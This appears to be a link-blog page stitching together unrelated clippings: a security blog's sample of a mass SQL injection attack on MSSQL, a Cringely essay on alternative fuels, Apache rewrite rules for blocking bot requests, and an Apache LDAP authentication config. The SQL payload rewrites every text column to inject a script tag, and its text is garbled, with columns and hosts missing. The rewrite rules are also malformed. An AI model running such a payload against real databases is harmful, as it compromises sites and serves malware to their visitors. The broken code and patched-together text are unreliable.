TrustedSource – Blog – New SQL Injection Attack Infecting Machines

Here’s a sample of the type of SQL Injection MSSQL (and possibly Sybase) databases may be subjected to:

DECLARE @T varchar(255), @C varchar(4000) DECLARE Table_Cursor CURSOR FOR select, from sysobjects a, syscolumns b where and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(’update [‘+@T+’] set [‘+@C +’]=[‘+@C+’]+””></title><script src=” w.js”></script><!–” where ‘+@C+’ not like ”%”></title><script src=” “></script><!–”’)FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

 TrustedSource – Blog – New SQL Injection Attack Infecting Machines

I, Cringely . The Pulpit . It’s the Platform, Stupid | PBS

Bob's Weekly Technification

I, Cringely . The Pulpit . It’s the Platform, Stupid | PBS

Robert X. Cringely Cars are the key to U.S. energy consumption. The dominant automotive platform here, whether you drive a truck, a car, or a motorcycle, relies on gasoline-fueled internal combustion engines. That’s the platform we are unlikely to change quickly. So how do we leave that platform intact and unchanged, ask nobody to significantly sacrifice, yet still achieve the noble (and Nobel) goals of lower fuel consumption, lower greenhouse gas emissions, lower pollution levels, dramatically lower oil consumption, lower cost, and lower geopolitical vulnerability for our country? There’s only one way I know to accomplish this: change the fuel.

This happened to a certain extent in Brazil during the ’70s and ’80s by embracing ethanol. But ethanol has less energy per gallon so fuel consumption goes up and mileage goes down. Ethanol can’t be shipped in pipelines also used for oil. Cars have to be modified to run on it and even then there are issues about internal corrosion. Ethanol is far from perfect. What’s needed is a replacement for gasoline that looks and feels and tastes just like gas to your car but isn’t made from oil. Then the platform could remain completely unchanged yet my 1966 Thunderbird (and the world) could benefit starting with the very next tankful.

There is such a fuel, developed by a husband and wife team of scientists working in Indiana in cooperation with Purdue University. This new fuel, called SwiftFuel, is right now intended for airplanes, not cars, but the lessons are the same.

How to nuke attackers via httpd.conf?

How to nuke attackers via httpd.conf?That can be accomplished using mod_access “Deny from <envar>” with mod_setenvif testing REQUEST_URI or by using mod_rewrite:

RewriteRule (¦xmlrpc.php¦includer.cgi¦$ - [F]

Of course, the problem is that you’ll still be wasting bandwidth sending your custom 403 error page to these idiots.A work-around (stay with me here) is to do the following:Create a new subdirectory below web root.Place a custom 403 error page in that subdirectory. Lets call it “403.html” for now. Leave out all the HEAD content, and just put a few characters in this file, so you can recognize it by filesize when fetched — I use just the text “No.”Now create an .htaccess file in that subdirectory that contains the following:

ErrorDocument 403 /path_to_this_subdirectory/403.html
Options +FollowSymLinks
RewriteEngine onRewriteRule !^403.html$ - [F]

Now, instead of the first code snippet I posted above, use the following in httpd.conf or in your web root .htaccess file:

RewriteRule (¦xmlrpc.php¦includer.cgi¦$ 
/path_to_subdirectory/$1 [L]

Now when a bad-bot attempts to fetch one of those files, it gets rewritten to the subdirectory. But no files in that subdirectory are allowed to be fetched except for 403.html. So, the 403 error handler is invoked, and returns only a 403-Forbidden server response header and the three-byte response from 403.html, thus minimizing your bandwidth loss.

Authenticate Apache 2 using Mac OS X Open Directory – Authenticate Apache 2 using Mac OS X Open Directory

Change this:


to this:


so it looks like this:

AuthType Basic
AuthName "Testing of LDAP auth"
AuthBasicProvider ldap
AuthzLDAPAuthoritative on
AuthLDAPBindDN uid=testaccount1,cn=users,dc=geo,dc=vuw,dc=ac,dc=nz
AuthLDAPBindPassword [plaintext password for user 'testaccount1']
AuthLDAPURL ldap://,dc=vuw,dc=ac,dc=nz
require valid-user

Clear as mud? 😉